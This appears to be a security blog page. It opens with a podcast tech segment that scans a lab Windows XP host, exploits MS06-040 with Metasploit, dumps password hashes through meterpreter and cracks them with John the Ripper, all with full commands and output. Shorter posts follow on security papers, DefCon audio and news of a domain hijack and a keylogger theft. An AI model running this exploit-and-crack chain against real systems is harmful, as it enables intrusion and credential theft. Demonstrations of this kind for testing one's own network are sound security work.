Episode106 – PaulDotCom Security Weekly

Tech Segment: Probe, Exploit, and Crack for Free

On my Linux box (could be OS X, but I got errors when I ran nessuscmd under OS X, Ron will be emailing me as soon as he listens to the show I run the nessuscmd, tell it to OS fingerprint with -O, Print out a full report with -V, use plugin-id 22194 (MS06-040), scan for TCP ports 139 and 445 with -sS 139,445, disable safe checking with -U, and to test host 192.168.10.139.

root@linux-box:~# /opt/nessus/bin/nessuscmd -O -V -i 22194 -v -sS -p139,445 -U 192.168.10.139

It reports:

Host 192.168.10.139 is up
Discovered open port netbios-ssn (139/tcp) on 192.168.10.139
Discovered open port microsoft-ds (445/tcp) on 192.168.10.139
[i] Plugin 11936 reported a result on port general/tcp of 192.168.10.139
[!] Plugin 22194 reported a result on port microsoft-ds (445/tcp) of 192.168.10.139
+ Results found on 192.168.10.139 :
– Host information :
[i] Plugin ID 11936
| Remote operating system : Microsoft Windows XP
| Microsoft Windows XP Service Pack 1
| Confidence Level : 99
| Method : MSRPC
|
|
|
| The remote host is running one of these operating systems :
| Microsoft Windows XP
| Microsoft Windows XP Service Pack 1

– Port netbios-ssn (139/tcp) is open
– Port microsoft-ds (445/tcp) is open
[!] Plugin ID 22194
|
| Synopsis :
|
|
| Arbitrary code can be executed on the remote host due to a flaw
| in the
| ’server’ service.
|
| Description :
|
|
| The remote host is vulnerable to a buffer overrun in the ‘Server’
| service
| which may allow an attacker to execute arbitrary code on the remote
| host
| with the ‘System’ privileges.
|
| Solution :
|
|
| Microsoft has released a set of patches for Windows 2000, XP and
| 2003 :
|
|
| http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
|
|
|
| Risk factor :
|
|
| Critical / CVSS Base Score : 10.0
| (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
| CVE : CVE-2006-3439
| BID : 19409

Sweet, I love vulnerabilities! They are sexy and exciting, especially MS006_040, because its just so delicious and begging to be devoured my metasploit. I have metasploit 3.1 installed in OS X:

/framework-3.1/trunk gordon$ ./msfconsole

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8′ 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 ‘Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo’ 8 `YooP8 `YooP’ 8YooP’ 8 `YooP’ 8 8
..:..:..:…..:::..::…..::…..:8…..:..:…..::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

=[ msf v3.2-release
+ -- --=[ 286 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 62 aux

I want to tell metasploit to use the following module:

msf > use windows/smb/ms06_040_netapi

I want to set my payload to a standard meterpreter bind shell, which will let me inject into processes dynamically:

msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

I then tell metasploit what to target:

msf exploit(ms06_040_netapi) > set RHOST 192.168.10.139

Here are what my options look like:

msf exploit(ms06_040_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.139 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options:

Name Current Setting Required Description
---- --------------- -------- -----------
DLL /Users/gordon/framework-3.1/trunk/data/meterpreter/metsrv.dll yes The local path to the DLL to upload
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 (wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)

Now I tell metasploit to execute my exploit with the above options:

msf exploit(ms06_040_netapi) > exploit

[*] Started bind handler
[*] Detected a Windows XP SP0/SP1 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.10.139[\BROWSER] …
[*] Building the stub data…
[*] Calling the vulnerable function…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.10.50:52375 -> 192.168.10.139:4444)

To access session 1 I use the following command:

msf exploit(ms06_040_netapi) > sessions -i 1

I then tell meterpreter to load the Sam Juicer module:

meterpreter > use -m Sam

Then I issue the “hashdump” command:

meterpreter > hashdump
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

So then I copy and paste those results into my other directory with John The Ripper Installed:

paimei:~/downloads/john-1.7.0.2/run gordon$ cat > hashes.txt
Administrator:500:EDIT:EDIT:::
Guest:501:EDIT:EDIT:::
HelpAssistant:1000:EDIT:EDIT:::
Noone:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c7cc675cf5fe2416208ed85f06dc6a63:::
TeamTed:1004:614433f3c97d4a70aad3b435b51404ee:e5128e6a0a230f4c0234591b3f7721dd:::

Then I crack the passwords using the stock dictionary that comes with John:

paimei:~/downloads/john-1.7.0.2/run gordon$ ./john hashes.txt
Loaded 9 password hashes with no different salts (NT LM DES [64/64 BS MMX])
TEAMTED (TeamTed)
(SUPPORT_388945a0)
(Noone)
(Guest)
COM (Administrator:2)
guesses: 5 time: 0:00:00:02 (3) c/s: 11060K trying: TOUSCEL – TOUSMIR
Session aborted

W00t! Now I have remote SYSTEM access to the target, and a username and password to try on other systems in less than 5 minutes. Sweet! I also have something that can be easily scripted and automated for testing my internal network, verifying vulnerabilities, all for free!

Share

Hide Sites

If you are interested to learn something about IT Security, Hacking or Vulnerability Exploitation this is the right place where to start. In this page i put more than 200 papers and the links of more than 100 books on this topic.

read more | digg story

Share

Hide Sites

Peps,

I have been trying to get a full list of the speakers of DefCon 15 in mp3 but have not found much just the odd file here and there.

This morning as I was loading up my TomTom 910 for the day ahead, I came across a site which claims to be the Official Defcon 15 Recordings Site.

These files are all hosted on defcon.org and you can subscribe to them as Podcasts.

DefCon 15 Audio in MP3
DefCon 15 Video in MP4

Right, back to the geek lab to have a play with what I have picked up today.

Enjoy

EH

Share

Hide Sites

Web designer David Airey has succeeded in recovering his domain after hackers exploited flaws in Gmail to trick his hosts into authorising a fraudulent transfer.

Airey’s woes began when he took his girlfriend for a month-long holiday to India on 21 November, a trip he mentioned in his blog. The holiday was a break from work and he only occasionally checked his emails.

All seemed well until shortly before his return when Airey received an email from a friend informing him that his website, Davidairey.com, had "disappeared".

At first Airey thought he’d made a mistake and allowed his domain name to expire and a domain poacher had snapped it up before he got the chance to renew it. Subsequent digging revealed a darker truth: hackers had posted a bogus transfer request on his web host support panel the day Airey left for India.

This, alongside an attack on a Gmail account run by Airey, allowed them to seize his domain and hold it for ransom. Initially crooks demanded $650 before dropping their offer down to $250.

Airey’s host, ICDSoft, were unable to reverse the transfer. The transfer request was initially sent to Airey’s Gmail account but forwarded to crooks after they used an exploit to forward the email to a third-party account. Gmail has since fixed the flaw but Airey says that users would still be wise to check their account settings to verify that they too haven’t been hit by the hack.

Recovering the domain through legal action would eat up far more in lawyer’s fees, perhaps a minimum of $1,500, and might take months. During that time Airey would also lose passing trade that the domain brought in. In the meantime Airey has established an alternative Davidairey.co.uk website.

Gmail exploit aids domain hijack

Share

Hide Sites

A keylogger on the computer of the Carson, Calif., treasurer enabled online thieves to transfer nearly half a million dollars to other bank accounts, according to news reports.

The thieves made two transfers: The first on May 23 for $90,000 and the next for $358,000 on the following day, according to a report in the Los Angeles Times. Carson Treasurer Karen Avilla noticed the transfers on May 24 and, with the help of the town’s bank, froze all but $45,000 of the money. A computer forensics team from the bank found a Trojan horse on her city-issued laptop, according to a report in ComputerWorld.

Read more

Share

Hide Sites